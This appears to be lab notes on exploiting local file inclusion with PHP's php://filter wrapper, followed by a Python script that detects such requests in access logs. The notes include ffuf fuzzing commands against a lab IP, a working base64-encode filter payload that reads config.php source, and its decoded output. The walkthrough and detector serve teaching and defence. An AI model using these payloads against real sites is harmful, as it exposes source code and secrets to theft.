PHP wrappers can be used to access different I/O streams at the application level, such as standard input/output, file descriptors, and memory streams. Attackers can utilize these wrappers to extend their exploitation of a file inclusion vulnerability: instead of only including files, they can read PHP source code or even execute system commands.
PHP filters are a type of PHP wrapper and have the syntax "php://filter/". The filter wrapper has several parameters, but the main ones used are "resource" and "read". The resource parameter specifies the stream to apply the filter on (e.g., a local file). The read parameter specifies which filters to apply to the input resource (several can be chained with "|"). The four types of filters available for use are: , , , and . The filter that is most useful for LFI attacks is the "convert.base64-encode" filter under the "Conversion Filters": because the included file is base64-encoded before it is returned, the PHP code is not executed by the server and the raw source can be decoded from the response.
root@htb:~$ locate directory-list-2.3-small.txt
root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .
#fuzz for php files
root@htb:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.50.242:54236/FUZZ.php -ic
index [Status: 200, Size: 2652, Words: 690, Lines: 64, Duration: 73ms]
en [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms]
es [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms]
configure [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 75ms]
* the -ic flag ignores wordlist comments
* do not limit the scanning to HTTP 200 response codes only; include other codes such as
`301`, `302` and `403`, as the source of those pages can still be read through the filter
wrapper and may contain valuable information (e.g. the `configure` page above returns 302)
#use basic PHP filters to read PHP source code
root@htb:~$ BROWSER > http://94.237.50.242:54236/index.php?language=php://filter/read=convert.base64-encode/resource=config
* view the page source to ensure the entire encoded string is copied, else it won't fully decode; note that the resource is given without the .php extension because the include statement appends it
root@htb:~$ echo 'PD9waHAK...SNIP...KICB9Ciov' | base64 -d
...SNIP...
if ($_SERVER['REQUEST_METHOD'] == 'GET' && realpath(__FILE__) == realpath($_SERVER['SCRIPT_FILENAME'])) {
header('HTTP/1.0 403 Forbidden', TRUE, 403);
die(header('location: /index.php'));
}
...SNIP...
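From the defender's side, the same wrapper syntax described above ("php://filter/read=<filters>/resource=<file>") is easy to spot in web server access logs. The following is an added example, not part of the original notes: it parses constructed Apache-style log lines, URL-decodes each query parameter, and reports any value that uses the php://filter wrapper together with the filters and resource requested. The log lines and IP addresses are made up for the demonstration.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (not from the original page): a benign
# request, the php://filter read shown in the notes, and a URL-encoded variant.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=en HTTP/1.1" 200 2652
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 1812
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?language=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex.php HTTP/1.1" 200 3540
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r"php://filter/", re.IGNORECASE)


def parse_filter_wrapper(value):
    """Return (filters, resource) if value is a php://filter URI, else None.

    Accepts both 'read=f1|f2/resource=r' and the short 'f1/resource=r' form.
    """
    if not WRAPPER_RE.match(value):
        return None
    body = value[len("php://filter/"):]
    resource = None
    idx = body.find("resource=")
    if idx != -1:  # resource may itself contain slashes, so take the remainder
        resource = body[idx + len("resource="):]
        body = body[:idx]
    filters = []
    for part in body.split("/"):
        if part.startswith(("read=", "write=")):
            filters.extend(part.split("=", 1)[1].split("|"))
        elif part:
            filters.append(part)
    return filters, resource


def find_filter_wrapper_requests(log_text):
    """Scan log lines; return (client_ip, param, filters, resource) per hit."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(m.group("uri")).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                # parse_qs decodes once; unquote again catches double encoding
                parsed = parse_filter_wrapper(unquote(raw))
                if parsed:
                    hits.append((client_ip, param, *parsed))
    return hits


if __name__ == "__main__":
    for ip, param, filters, resource in find_filter_wrapper_requests(SAMPLE_LOG):
        print(f"{ip} used php://filter via '{param}': filters={filters} resource={resource}")
```

Because the wrapper only works when user input reaches include(), the fix on the application side is an allowlist of permitted language files rather than any attempt to blacklist wrapper strings.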